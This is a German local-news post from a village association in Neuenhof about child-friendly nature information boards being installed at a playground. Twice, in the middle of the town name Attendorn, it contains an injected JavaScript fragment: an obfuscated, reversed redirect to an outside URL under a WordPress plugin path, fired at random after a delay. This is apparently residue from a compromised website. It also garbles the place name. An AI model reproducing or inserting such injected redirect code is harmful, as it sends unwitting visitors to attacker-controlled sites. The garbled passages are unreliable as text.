Skip to content Skip to main navigation Skip to footer

„Kindergerechte Natur-Lehrtafeln“ am Spielplatz Neuenhof

Am Donnerstag den 11. Juli hat die Dorfgemeinschaft Neuenhof ihr Projekt „Kindergerechte Natur-Lehrtafeln“ am Spielplatz Neuenhof vorgestellt und die Tafeln angebracht.

Neben interessierten Dorfbewohnern und einigen Kindern nahmen auch Herr Martin Plückebaum – Umweltbeauftragter der Stadt Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn – und Frau Jutta Korte, die das Layout der Tafeln erstellt hat, an der Präsentation teil.

Friedhelm Kramer – Sprecher der DG und Initiator des Projekts – beschrieb den Projektverlauf und erläuterte die einzelnen Tafeln.

Die Anregung für das Projekt erhielt er durch die bekannten, handlichen Naturführer „Mitläufer“/ „Augen Blick mal“, welche von der Stadt Olpe herausgegeben werden.

Die Motive in diesen Broschüren wurden von Frau Dipl. Biologin Sandra Schulte handgemalt und koloriert und dürften Kinder – im Gegensatz zu sterilen Fotos – wohl besonders ansprechen. Aber auch Erwachsene können anhand der naturgetreuen Abbildungen ihre Naturkenntnisse auffrischen oder solche erwerben.

Frau Sabine Melzer-Baldus, die Umweltschutzbeauftragte der Stadt Olpe, bei der die Bildrechte liegen, war spontan begeistert von der Projektidee und erteilte umgehend die Genehmigung zur Nutzung der Bilder.

Frau Jutta Korte, die das Layout der Broschüren gestaltet hat, erklärte sich bereit, auch die Druckvorlagen nach dem Konzept der DG Neuenhof hinsichtlich Motivauswahl, Anordnung, Größe etc. zu erstellen.

Der Druck erfolgte durch die Firma KOCH Werbetechnik.

Angebracht wurden zunächst 6 Tafeln im Format 50×60 cm mit den Motiven:

„Singvögel aus Dorf und Garten“, „Wald- und Wiesenvögel“, „Greifvögel, Spechte und Eulen“, „Schmetterlinge und ihre Raupen“, „Heimische Bäume 1und 2“.

Laut Frau Schulte kommen alle dargestellten Objekte im heimischen Raum (Südwestfalen) vor.

Der Projektantrag wurde am 24. Juni in der APU-Sitzung der Stadt Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn und mit Zustimmung aller Fraktionen einstimmig gebilligt.

Die DG Neuenhof bedankt sich bei allen Unterstützern und Helfern des Projekts und insbesondere bei der Sparkasse ALK, der Volksbank BIGGE- LENNE und der Firma KIRCHHOFF Automotive für deren Spenden, ohne die das Projekt nicht realisierbar gewesen wäre.

Die Teilnehmer der Aktion waren überrascht und sehr erfreut, als am späten Nachmittag noch Bürgermeister Christian Pospischil am Dorf-/Spielplatz eintraf. Er bekundete damit sein großes Interesse an dem Projekt und lobte die Maßnahme ausdrücklich.

12.07.2019 Friedhelm Kramer